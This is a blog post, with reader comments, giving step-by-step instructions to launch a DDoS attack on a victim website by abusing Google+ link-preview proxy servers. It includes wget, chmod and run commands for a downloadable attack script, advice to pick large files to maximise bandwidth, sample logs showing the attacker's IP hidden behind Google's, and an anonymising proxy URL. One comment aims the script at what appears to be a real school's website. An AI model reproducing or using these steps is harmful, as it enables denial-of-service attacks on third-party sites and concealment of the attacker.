Recently we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ Servers can be use for DDoS attack. Lets talk about this ant script, Hey.. but it is worthy 
How DDoS Attack Using Google+ Servers works?
When you post a URL on your Google+ status it fetches URL Summary (It includes Image + Short description) using Google+ Proxy Servers.
Advisory report says; vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“
So if you send multiple parallel requests with a big number e.g 1000 that can be turn into DDoS attack using Google+ Servers huge bandwidth.
How to use DDoS script to launch a DDoS attack Using Google+ Servers?
Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com
Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh
Make it executable :
chmod u+x ddos.sh
Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000
Now, lets look at this example :
It is recommended to find a full path to some big file which is downloadable without requesting for CAPTCHA.
e.g http://www.victim-website.com/some-file-url/file-name.mp3
NOTE : Make sure your workstation is capable to handle this huge number else your workstation will freeze and you will have to force fully restart your own workstation
e.g 1000 is very big number.
You will see anonymous source instead of Real Source IP:
See sample apache webserver log below
209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
You can also access it in browser to remain anonymous using below example URL (replace URL with your own choice) :
https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none
If you have any question or unable to run this, Feel free to write us 
{ 3 comments… read them below or add one }
I don’t understand how to do this I only want to to know for personal reasons I tried to ddos attack my own website and I haven’t been able to how do I do this can you make it more simpler thanks guys.
can you help me… i dont understand it… i post it on google + what then pls make it simpler
./ddos.sh os-zamet-ri.skole.hr/wp-content/uploads/2012/01/IMG_0653.jpg 1000 ?
This no longer works. In access.log it shows your IP, not google’s any more. I tested this against my own webserver.